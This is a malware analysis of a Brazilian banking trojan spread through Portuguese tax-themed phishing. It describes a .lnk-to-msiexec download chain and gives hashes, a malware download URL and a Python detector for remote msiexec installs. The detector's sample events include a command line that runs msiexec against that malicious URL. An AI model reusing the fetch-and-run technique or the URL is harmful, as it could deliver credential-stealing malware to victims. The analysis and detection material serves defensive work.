A new variant of a Brazilian banking trojan has been affecting Internet users in Portugal since last month (February 2022). This is a study of the artefacts and IOCs gathered from the campaign, which shows no notable change in skill when compared with other well-known trojans such as Maxtrilha, URSA and Javali.
- The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
- An HTML file downloads a .lnk file masquerading as an MSI file; the .lnk abuses LoLBins to execute an MSI file (segunda.msi).
- “segunda.msi” downloads and executes an EXE file that will drop the final stage.
- The trojan itself installs or modifies Windows trusted certificates, monitors open windows so it can perform banking overlay attacks to steal credentials, and can deploy additional payloads executed via DLL injection.
- The victims’ data is encrypted and sent to the C2 server geolocated in Russia.
To spread the threat in the wild, the malware uses a template impersonating the Portuguese Tax Services (Autoridade Tributária e Aduaneira). Maxtrilha, one of the most active trojans in Portugal, targets users with the same templates, so we believe this is a new Maxtrilha variant. Most of the artefacts collected match a threat that was documented in 2020 and is available here. This supports the observation that Latin American threat groups share code and TTPs.
After extracting the ZIP file, a .lnk file disguised as an MSI (Faturas.lnk – 490f5b97a2754e50a7b67f2e00d2b43b) appears. This file uses the “msiexec.exe” Living off the Land binary to download and run another MSI file (segunda.msi – a4b91a89b8d2bff27ed1e13e334109be8b207d48a6284f529391c5391d96f141) from “https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true”. The second MSI file runs in the background and downloads a fresh binary using the same method.
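The delivery chain above hinges on msiexec.exe being handed a remote URL instead of a local package, which is something a defender can look for in process-creation telemetry. The following is an added detection example, not code from the original report: it parses a constructed, Sysmon-like `Image|ParentImage|CommandLine` layout (an assumption about the log format), flags any msiexec.exe invocation whose command line carries an http(s) URL, and escalates to an IOC match when the URL is the segunda.msi download location quoted on the page. The sample events and the exact command-line syntax are constructed for illustration; the page does not give the .lnk's actual command line.

```python
import re

# IOC taken from the page: the location from which segunda.msi is fetched.
KNOWN_BAD_URLS = {
    "https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/"
    "sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true",
}

# Any http(s) URL token on a command line; case-insensitive because
# msiexec accepts "HTTP://" just as happily as "http://".
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample events (layout: Image|ParentImage|CommandLine).
# The third line uses a placeholder domain, not an IOC from the page.
SAMPLE_EVENTS = [
    r"C:\Windows\System32\msiexec.exe|C:\Windows\explorer.exe|msiexec.exe /i "
    "https://cld.pt/dl/download/98c9149d-c4a5-4360-9097-90a12fa8d96f/"
    "sapotransfer-5d8a5a32728f4N2/segunda.msi?download=true /q",
    r"C:\Windows\System32\msiexec.exe|C:\Windows\explorer.exe|msiexec.exe /i C:\Users\ana\Downloads\setup.msi /qn",
    r"C:\Windows\System32\MSIEXEC.EXE|C:\Windows\explorer.exe|MSIEXEC.EXE /I HTTP://example.invalid/pkg.msi /QN",
    r"C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad.exe C:\Users\ana\notes.txt",
    r"C:\Windows\System32\msiexec.exe|C:\Windows\System32\services.exe|msiexec.exe /x {1D2A3B4C-0000-0000-0000-000000000000}",
]


def parse_event(line):
    """Split one constructed event line into its three fields."""
    image, parent, cmdline = line.split("|", 2)
    return {"image": image.strip(), "parent": parent.strip(), "cmdline": cmdline.strip()}


def classify(event):
    """Return 'ioc_match', 'remote_msi' or None for one parsed event."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if image_name != "msiexec.exe":
        return None
    urls = URL_RE.findall(event["cmdline"])
    if not urls:
        # Local package install or uninstall: msiexec fetches nothing itself.
        return None
    for url in urls:
        if url.rstrip(".,;") in KNOWN_BAD_URLS:
            return "ioc_match"
    # Remote package install is unusual enough on end-user hosts to review.
    return "remote_msi"


def scan(lines):
    """Return (verdict, command line) pairs for every event worth raising."""
    findings = []
    for line in lines:
        event = parse_event(line)
        verdict = classify(event)
        if verdict is not None:
            findings.append((verdict, event["cmdline"]))
    return findings


if __name__ == "__main__":
    for verdict, cmdline in scan(SAMPLE_EVENTS):
        print(f"{verdict:11s} {cmdline}")
```

The local install, the uninstall by product code and the unrelated notepad.exe launch produce no finding, so the rule stays quiet on routine software deployment; only the two msiexec invocations that reach out to a URL are raised, and the one matching the page's download location is promoted to an IOC hit.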
The purpose of this binary is to download the malware’s final stage. It was written in Visual Studio .NET and contains a lot of junk code that slows down and complicates analysis. Buried within that junk, however, the “FormPool” form is activated: it downloads two EXE files, including the final malware stage (sear.exe), and then executes its “loader”.
The final malware stage is a Delphi binary that resembles other Latin American trojans and contains the target banking strings. The main form, “fCentral”, is made up of five timers that perform various activities, including:
- looking for open windows matching the hardcoded strings and launching the overlay-window attack when the victim accesses specific home banking portals
- collecting keystrokes and clipboard data (keylogger capabilities)
- capturing screenshots and webcam images
- obtaining details about the machine, including hostname, AV, available drives, etc.
- hijacking Windows trusted certificates to provide a proxy channel between the criminals and infected machines
Finally, the researchers concluded that they “were currently dealing with a rapid increase in Brazilian trojans. Each one has its own quirks, TTPs, and so on. Hackers create a false positive (FUD) situation that allows them to avoid discovery while affecting a vast number of people all over the world.”